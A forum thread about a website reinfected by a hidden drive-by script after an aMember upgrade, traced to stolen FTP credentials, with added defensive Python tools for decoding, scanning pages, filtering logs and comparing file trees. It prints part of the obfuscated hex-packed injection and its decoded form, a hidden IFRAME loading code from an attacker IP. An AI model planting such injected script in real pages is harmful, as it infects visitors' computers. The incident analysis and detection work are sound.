I have upgraded to 3.1 and each time I install it I get a dodgy script which is added to my index.html and index.php pages (below). I have uninstalled/reinstalled it twice now, and cleaned the other index.html pages in my other directories. My web site runs fine all night until I re-install amember 3.1. Then within a few minutes the virus is back (AdvanceXPDefender tries to download a file). I have the latest AV software (Symantec Endpoint), and have run Spybot and other top spyware apps - all show a clean system. The script must be getting in somewhere when amember is installed. I have even reformatted my drive and reinstalled a fresh copy of Windows - the same thing happens. Can anyone help? Regards Adrian

This is a 'section' of the script that is written to my html and php index pages:

var d=document,kol=561; function O10H485D4118216E1(H485D411821ED8){ var H485D4118226D0 = 16; return( parseInt(H485D411821ED8,H485D4118226D0));}function H485D4118236C5(H485D411823EC1){ var H485D4118246B6='';for(H485D411824EAF=0; 333835206865696768743D333032207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E')); //-->
Ok, this does look very dodgy and potentially very dangerous. Please confirm that you downloaded the 3.1 update directly from your amember.com member area and nowhere else? All updates should come from amember.com and NOT any other domain name, no matter how similar it sounds or how similar the website looks. If you contact me at phill@getresults.co.nz and send me an index page with the full javascript intact, I can probably decode it and find out what it's doing. If you installed the official Amember update from amember.com then it is possible that your server / hosting account may have been compromised and someone is able to get in to add extra code to your amember pages. This might be someone logging in manually or a script that has been installed on your server. At the very least I'd recommend changing your hosting cpanel / FTP passwords immediately and start checking log files to see if there are any successful logins from IP addresses that you're not using. If you find any strange IP addresses you can search webserver log files for those IP addresses to see what files are being accessed on your server. It's really hard to say what is going on without seeing a full copy of the dodgy code, but I suggest treating this with the highest priority because of the risk that your amember code / databases may have been compromised. This is *critically* important if you are using any payment systems that store credit card data in the amember database.
I've been researching this further and it may be related to the Advanced-XP-Defender trojan: It looks like it isn't exclusively an Amember problem - it's also affecting Wordpress and other scripts. See this thread: http://wordpress.org/support/topic/182061#post-779851 Particularly from: http://wordpress.org/support/topic/182061#post-786138 It looks like it may be related to FTP password security so definitely change your FTP passwords after cleaning out all the infected scripts on your site. That seems to be solving the problem for some users.
More info... I decoded the javascript and here's what it inserts into your web pages when they're run:

<script>if(!myia){d.wr ite('<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*37952)+'f3449\' width=593 height=64 style=\'display: none\'></IFRAME >');}v ar myia=true;</script>

** WARNING: DO NOT COPY AND PASTE THIS CODE INTO ANY OF YOUR SITES! **

So the first thing you can do is log into your control panel and block IP address 77.221.133.171. As long as the malicious javascript being inserted into your sites is exactly the same, then this should block whatever script is running at 77.221.133.171/if/go.html. Also recommended is changing your FTP software. I see some discussion about the possibility that when Advanced XP Defender infects a Windows computer it may compromise your FTP software, which means every time you FTP to your websites your files may be reinfected.
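The packing used by the script in the first post is simple: a long string of hex digits is read two characters at a time, each pair is converted with parseInt(pair, 16), and the resulting characters are concatenated and written into the page. The following is an added example (not code from the thread or from aMember) that decodes that hex tail without executing any of it, and scans a page for the markers Phill's decoded version exposes: a hidden IFRAME, the myia guard variable, the parseInt-base-16 decoder stub, a long hex blob, and the go.html URL. The sample pages are constructed for the example, and the decoded text of the pasted tail is slightly different from Phill's (height=302 rather than width=593 height=64), which is why the scanner keys on structure rather than one exact string.

```python
"""Decode the hex-packed JavaScript from the thread and flag its markers."""
import re

# Hex payload copied verbatim from the tail of the script pasted in the first post.
HEX_TAIL = (
    "333835206865696768743D333032207374796C653D5C27646973706C61793A206E6F6E65"
    "5C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E"
)

def decode_hex_pairs(hex_text: str) -> str:
    """Mirror the obfuscator's loop: two hex digits at a time, parseInt(.., 16),
    append the character. Pure string work; nothing is eval'd or written to a page."""
    hex_text = re.sub(r"\s+", "", hex_text)
    if len(hex_text) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hex_text):
        raise ValueError("payload is not an even-length hex string")
    return "".join(chr(int(hex_text[i:i + 2], 16)) for i in range(0, len(hex_text), 2))

# A quoted run of 120+ hex digits is the packed form; capture group 1 is the blob.
HEX_BLOB = re.compile(r'''["']([0-9A-Fa-f]{120,})["']''')

# Indicators of this specific injection, drawn from the decoded output in the thread.
INDICATORS = {
    "hidden_iframe": re.compile(r"<IFRAME[^>]*display:\s*none", re.I),
    "myia_guard": re.compile(r"\bmyia\s*=\s*true\b"),
    "hex_decoder_stub": re.compile(r"=\s*16\s*;\s*return\s*\(\s*parseInt\("),
    "long_hex_blob": HEX_BLOB,
    "go_html_url": re.compile(r"77\.221\.133\.171/\.?if/go\.html"),
}

def scan_page(text: str) -> list:
    """Names of indicators found in one HTML/PHP page, [] if clean. Long hex blobs
    are decoded first so markers hidden inside the packed form are also caught."""
    found = [name for name, rx in INDICATORS.items() if rx.search(text)]
    for blob in HEX_BLOB.findall(text):
        try:
            decoded = decode_hex_pairs(blob)
        except ValueError:
            continue
        for name, rx in INDICATORS.items():
            if name not in found and rx.search(decoded):
                found.append(name)
    return found

# Constructed sample pages (not real captured files): clean, injected in the form
# Phill decoded, and injected in the packed hex form with the decoder stub.
SAMPLE_CLEAN = "<html><body><p>Members area</p></body></html>"
SAMPLE_DECODED = (
    "<html><body><p>Members area</p>"
    "<script>if(!myia){d.write('<IFRAME name=O1 src=\\'http://77.221.133.171/.if/go.html?1f3449\\' "
    "width=593 height=64 style=\\'display: none\\'></IFRAME >');}var myia=true;</script>"
    "</body></html>"
)
SAMPLE_PACKED = (
    "<script>var d=document;function O1(h){ var b = 16; return( parseInt(h,b));}"
    "d.write(dec('" + HEX_TAIL + "'));</script>"
)

if __name__ == "__main__":
    print(decode_hex_pairs(HEX_TAIL))
    for label, page in (("clean", SAMPLE_CLEAN), ("decoded", SAMPLE_DECODED), ("packed", SAMPLE_PACKED)):
        print(label, "->", scan_page(page) or "no indicators")
```

Run scan_page over every .html and .php file under the web root to find the pages the reinfection touched; the thread's reports show it rewrites index pages in several directories, not just the aMember ones.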
Thanks for the responses. Yes I downloaded version 3.1 direct from my amember members page. It sat on my desktop for 2 minutes, then I ftp'd it and began having more problems. I spent the evening navigating my site WITHOUT amember uploaded and all was well. As soon as I uploaded amember again (even before I configured it) I got the blasted script, which ran as soon as I went to my domain URL. I deleted amember and checked my index.html pages (got several in various directories on my site) and sure enough - the code had been inserted. I cannot change my ftp password until Monday, but have changed everything else. I use WS_FTP Pro, but will try Quteftp on Monday just to be on the safe side. I have always found amember to be a great product, so need to resolve this. This did not begin with v3.1. I have been running 3.0.8 since it came out without problem. This began a week or so ago, hence the reason I upgraded. I also took the security advice of amember support and deleted vulnerable files from 3.08 when I first installed it. Thanks for the input
Would you please do something for me? Unzip the Amember update zip on your local computer and check the index.html file to see if the malicious code is in there. Next use your ftp software to upload the index.html file to a test directory on your server. Then using your control panel file browser, view the index.html file and see if the malicious code is in there. If it is then that would confirm that your FTP client has been modified and is causing the problem when it uploads new files to your server.
Did that, and did not find any code change (which is good news as I quite like WS FTP Pro, and don't really want to pay out more money). I then uploaded amember again. This time I deleted the recommended files in amember/plugins/payment BEFORE I uploaded. I got the script running again when I configured it, BUT (here's the thing) it only wrote to one index.html page in my password protected area - no other problems so far (after 1 hour of navigating around). I don't seem to be able to get the AdvancedXPDefender to run again, wherever it was hiding?! (not that I want it to). I have tried on my main PC, my laptop, and my neighbour's PC - so far, nothing? One thing that I have noticed (though probably nothing to do with this virus problem) is that when I log in to member.php, it opens fine, and all seems well, but there is a 'Done but with errors on the page' message on the status bar (details read: line 209/char 9/object expected/code 0). All in all, very strange
Oh well. After about 4 hours, guess what - it came back and wrote the script to all my index pages! I have removed amember and the rest of my site index pages seem to stay as they are - gotta be something to do with php
With the help of Getresults, the problem has been identified as a breach of my ftp by a Russian hacker. I am in the process of getting my server upgraded etc. Thanks Phill, you got results, and I am very grateful to everyone who has helped. thanks all
You're welcome. Info for others reading this thread:

* We're not yet sure how the user's FTP login details are being compromised but somehow these hackers are getting FTP username & password details.
* This might be via a Windows based virus / malware that infects a user's computer and grabs the details somehow - modifying common FTP software to send password details, key logging etc. Or, it might be that the Windows hosting server has been compromised and some malicious scripts installed affecting some or all user accounts on that server.
* However the code gets installed, there seems to be some sort of automated mechanism that monitors infected pages and if the javascript code disappears from the page (removed by the site owner) then some sort of automated script will log in via FTP and infect the files again.
* Quick solution appears to be to block access to 77.221.133.198 (where the FTP logins come from) and 77.221.133.171 (where the javascript is loading code from). In fact, depending on the control panel you're using I would tend to block the whole 77.221.133.* subnet.
* Changing all of your passwords is a particularly good idea - and make sure your control panel and FTP passwords are different.
* If you don't have an offsite backup - do one IMMEDIATELY, including your databases. Remember if they can get in via FTP, they can delete all your web content. If your FTP login details are the same as your control panel details, they could delete your web content, databases, email, everything.
* I recommend checking your FTP and webserver logs for any access to IPs in the 77.221.133.* range. If you see anything suspicious or you discover you've been affected, talk to your hosting provider immediately.

I'll post more info if / when I find out more.
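The log check Phill recommends (look for FTP logins and web hits from the 77.221.133.* range) is easy to get wrong with a plain text search, which also matches addresses like 177.221.133.5 or timestamps. This added example (not from the thread, aMember, or any hosting panel) parses IPv4 addresses out of log lines properly and tests them against the block list as a network, and separately tallies successful FTP logins per source so that an unfamiliar address outside the known range still stands out. The log lines are constructed for the example in Apache combined format and pure-ftpd's login line format; the user name and dates are made up. Treat the address block list as a stopgap: the attacker's addresses can change, while a rotated FTP password and a review of the login sources are what actually close the door.

```python
"""Flag FTP and web-server log lines from the attacker's address range."""
import ipaddress
import re

# Range named in the thread; the two hosts seen were .198 (FTP logins) and .171 (go.html).
BLOCKED_NETWORKS = [ipaddress.ip_network("77.221.133.0/24")]

# Constructed sample lines (not real logs). Lines 2, 3 and 5 are the attacker's.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2008:21:03:11 +1200] "GET /index.html HTTP/1.1" 200 4211
77.221.133.198 - - [12/Jun/2008:21:07:45 +1200] "GET /amember/index.html HTTP/1.1" 200 4398
Jun 12 21:07:40 host pure-ftpd: (?@77.221.133.198) [INFO] adrian is now logged in
Jun 12 09:15:02 host pure-ftpd: (?@198.51.100.20) [INFO] adrian is now logged in
77.221.133.171 - - [12/Jun/2008:21:09:02 +1200] "GET /.if/go.html?12f3449 HTTP/1.1" 200 612
"""

# Dotted quad not glued to other digits or dots, so 177.221.133.5 is not a partial hit.
IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

def addresses_in(line: str) -> list:
    """Every syntactically valid IPv4 address on a log line, in order of appearance."""
    out = []
    for candidate in IPV4.findall(line):
        try:
            out.append(ipaddress.ip_address(candidate))
        except ValueError:  # e.g. 999.1.1.1 matched the regex but is not an address
            pass
    return out

def flagged_lines(log_text: str, networks=BLOCKED_NETWORKS) -> list:
    """(line_number, address, line) for each line carrying an address in a blocked network."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for addr in addresses_in(line):
            if any(addr in net for net in networks):
                hits.append((n, str(addr), line))
                break
    return hits

def ftp_logins_by_source(log_text: str) -> dict:
    """Count successful pure-ftpd logins per source address. Review every address
    you do not recognise, whether or not it falls in the known range."""
    counts = {}
    for line in log_text.splitlines():
        if "pure-ftpd" in line and "is now logged in" in line:
            for addr in addresses_in(line):
                counts[str(addr)] = counts.get(str(addr), 0) + 1
    return counts

if __name__ == "__main__":
    for n, addr, line in flagged_lines(SAMPLE_LOG):
        print(f"line {n}: {addr}: {line}")
    print("FTP logins by source:", ftp_logins_by_source(SAMPLE_LOG))
```

On a real server feed the access log and the FTP daemon log (pure-ftpd, proftpd and vsftpd each use their own line format, so adjust the login-line test) through the same two functions, and compare the login sources against the addresses you and your webmaster actually use.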
It looks like sites using Coppermine Gallery may be one source of the vulnerability: http://forum.coppermine-gallery.net/index.php/topic,51882.0.html

If you are not using the latest version direct from the Coppermine Gallery website, update it right away. Do NOT wait for Fantastico to release the latest update as that might take a while.

Hack thread: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
Sanitization thread: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

This may not be the only way they are getting in.
I have now set my ftp and cp with different passwords. I have even changed my ftp client from wsftp to quteftp pro (just in case the hacker can track wsftp's use somehow) - probably good to be paranoid now. I have even installed the Online-Armour firewall (not the free version) http://www.tallemu.com/ Great stuff this global world, worth the odd stress now and again.
Wow getresults, you know your stuff. Are there any ways users can virus scan webspace to check safety?
Possible virus attack? Hello, My webmaster just upgraded our amember to the newest version 3.1.0. The same day our site went down. Host was able to pull it back up again, however the very NEXT day the site went down again; this time the issue was that the site was unable to process any php files. Weird, seeing we COULD up until installing the newest amember. We are unsure if this is associated with the virus being discussed here, but it's uncanny that the site would have gone down TWICE after installing amember. NOW my webmaster cannot log into the admin section of our amember; it just spins and brings up a blank page. What should my webmaster be looking for? Thanks so much.
Hmmmm. It doesn't sound like it's exactly the same problem, although it may be using the same exploit in something like Coppermine Gallery if it is another hack. Email me at phill@getresults.co.nz and I'll take a quick look at your site. The best advice I can give at the moment is to check your FTP and webserver logs and see if you are seeing any unauthorized FTP access or web traffic from countries you're not expecting. Change your FTP & control panel passwords right away and make sure they're different if possible. Do not change them to any other passwords you use regularly - use temporary ones that are highly secure until you solve the problem. By highly secure I mean a mixture of upper & lowercase letters and at least 2 numbers and/or characters. I saw someone else post recently that their amember admin page had gone blank - I wonder if they were running version 3.10 as well? I think it's unlikely that there's a new security flaw in 3.10 but it's worth keeping in mind while these problems are reported.
Generally not, unless you have root-level access to the server. You can ask your web host to do a virus / malware scan and they may be able to help with that. If you're suspicious that some of your amember files have been modified you can compare file sizes with the same files from a brand new copy of the Amember archive. Also make sure you are 100% up to date with any other scripts you are running on your web host - Coppermine Gallery is one script that has had two very nasty exploits identified recently. So check everything else with the main site for those scripts.
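Both the upload test Phill asked Adrian to run earlier in the thread and the suggestion above to compare deployed files against a fresh copy of the aMember archive come down to the same check: diff a known-good tree against the live one. File sizes are a weak signal (a substituted string of the same length passes), so this added example (not code from the thread or from aMember) hashes every file with SHA-256 and reports files that were modified, files present on the server that are not in the archive (dropped-in scripts), and files that went missing. The demo builds two small constructed trees in a temporary directory; on a real host, unpack the archive locally, pull the deployed directory down with your FTP client, and point the two roots at those. Files you edited on purpose (config.inc.php and the like) will show as modified and need a manual look.

```python
"""Compare a freshly unpacked aMember archive against the deployed copy."""
import hashlib
import os
import tempfile

def sha256_of(path: str) -> str:
    """SHA-256 of one file, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def tree_digests(root: str) -> dict:
    """Map each file path relative to root to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root)] = sha256_of(full)
    return digests

def compare_trees(clean_root: str, deployed_root: str) -> dict:
    """What differs between the known-good tree and the live one.
    'modified' catches an injected script even when the size is unchanged,
    'extra' catches files that were never in the archive (web shells, .htaccess
    changes), 'missing' catches deletions. Paths use forward slashes."""
    clean = tree_digests(clean_root)
    live = tree_digests(deployed_root)
    norm = lambda p: p.replace(os.sep, "/")
    return {
        "modified": sorted(norm(p) for p in clean if p in live and clean[p] != live[p]),
        "extra": sorted(norm(p) for p in live if p not in clean),
        "missing": sorted(norm(p) for p in clean if p not in live),
    }

def _write(path: str, text: str) -> None:
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)

def demo() -> dict:
    """Build two constructed trees (illustration only, not real aMember files) and diff them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean")
        live = os.path.join(tmp, "live")
        for root in (clean, live):
            os.makedirs(os.path.join(root, "amember"))
        page = "<html><body>Members area</body></html>\n"
        # Same page with a script tag injected, as the thread describes.
        injected = page.replace("</body>", "<script>var myia=true;</script></body>")
        _write(os.path.join(clean, "amember", "index.html"), page)
        _write(os.path.join(live, "amember", "index.html"), injected)
        # Unchanged file: present and identical on both sides, so it is not reported.
        _write(os.path.join(clean, "amember", "config.inc.php"), "<?php $x = 1; ?>\n")
        _write(os.path.join(live, "amember", "config.inc.php"), "<?php $x = 1; ?>\n")
        # In the archive but deleted on the server.
        _write(os.path.join(clean, "amember", "readme.txt"), "aMember 3.1\n")
        # On the server but not in the archive.
        _write(os.path.join(live, "amember", "x.php"), "<?php /* not in the archive */ ?>\n")
        return compare_trees(clean, live)

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths or '-'}")
```

The same script serves the earlier upload test: hash the local index.html, upload it, download it again into a second directory and compare; any difference means something between your FTP client and the server changed the file in transit or at rest.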